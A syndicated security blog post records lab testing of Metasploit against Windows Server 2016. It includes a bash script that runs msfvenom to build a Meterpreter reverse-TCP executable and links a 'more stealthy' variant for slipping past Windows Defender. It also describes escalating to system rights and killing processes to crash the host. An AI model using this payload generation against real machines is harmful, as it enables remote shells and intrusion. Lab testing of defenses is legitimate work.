Quantcast
Channel: Astr0baby's not so random thoughts _____ rand() % 100;
Viewing all articles
Browse latest Browse all 183

Windows 2016 Server and Metasploit

$
0
0

Alive and kicking. Windows 2016 10.0.14393 RTM and some Metasploit testing. Decided not to use MobaXterm for file transfer as this messes up the NTFS security permissions somehow.

This time I have just used Samba to transfer the payloads to the testing system.

In the first scenario I have just used a simple venom generated EXE to check the Windows Defender awareness on the Windows 2016 system. As expected it detects the generated payload and blocks the file transfer.

clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R -f exe > default.ex

Next we try the more stealthy method

https://github.com/DoktorCranium/metasploit/blob/master/CUSTOM-meterpreter.sh

From within the default Administrator account no UAC bugs us to get some good system permissions.

Once we get the permissions, some messing around with killing some PIDs to bring the system down.

Please see the recording of the above example here:

 



Viewing all articles
Browse latest Browse all 183

Trending Articles